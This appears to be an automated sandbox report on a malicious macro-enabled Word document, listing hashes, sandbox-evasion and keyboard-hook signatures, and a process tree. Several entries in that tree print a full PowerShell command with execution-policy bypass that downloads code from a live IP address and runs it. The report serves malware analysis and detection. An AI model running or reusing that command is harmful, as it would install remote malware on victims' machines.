Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12/02/2024, 06:01
Behavioral task
behavioral1
Sample
Application#37.docm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Application#37.docm
Resource
win10v2004-20231215-en
General
-
Target
Application#37.docm
-
Size
79KB
-
MD5
5a53fcaae49b293fb475009b089289d2
-
SHA1
43d00e702689a60108206055e7448a114b018da0
-
SHA256
72f6526ae5d46195d9105ccb43d074a15dc7a775e577ca42b3b06964aad4c8ec
-
SHA512
9ed406f3bf2a2d97b21b36142220b3bf84f9e51cc7ec883d7c910b7fc8c9eb52d20687f5a96670a8cff8da683a0c7efdb6fdd04cce38be39cebee20a4f099beb
-
SSDEEP
1536:3rqu+lO2Oq6qKSJBKixVjYWdp4RvikgWUNXRIDBXceQ23B5X8Qr37L6:3ryuq6qtK1v5g3NXRI/Q23Xxr37L6
Malware Config
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4672 4776 wscript.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 936 4776 wscript.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 380 4776 wscript.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2688 4776 wscript.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3228 4776 wscript.exe 84 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3300 WINWORD.EXE 3300 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3300 WINWORD.EXE 3300 WINWORD.EXE 3300 WINWORD.EXE 3300 WINWORD.EXE 3300 WINWORD.EXE 3300 WINWORD.EXE 3300 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Application#37.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3300
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radAC660.tmp1⤵
- Process spawned unexpected child process
PID:4672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"2⤵PID:3800
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radBF177.tmp1⤵
- Process spawned unexpected child process
PID:936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"2⤵PID:4684
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radF477A.tmp1⤵
- Process spawned unexpected child process
PID:380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"2⤵PID:1352
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\rad5898E.tmp1⤵
- Process spawned unexpected child process
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"2⤵PID:2928
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\rad9573F.tmp1⤵
- Process spawned unexpected child process
PID:3228
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD543f4bec966ab901ac034fc136a642fa5
SHA18e7227cefec8b05c9a79b2751d1261187b9c0422
SHA25609ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4
SHA512a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
239B
MD5992a432c3157b0be41fe29065b8a657b
SHA1cdb80a231235ac2030e6f9574a57719a76d8cbbd
SHA2562bc95ede5c16f9be01d91e0d7b0231d3c75384c37bfd970d57caca1e2bbe730f
SHA512bada3ff90afd441e21972ad138771f2d737684215bd19a679d68882a0f38e70ac47da0fc4d154faf63cff5e0cce01ca45bbef27a4aec635e097cf863a4336e91
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84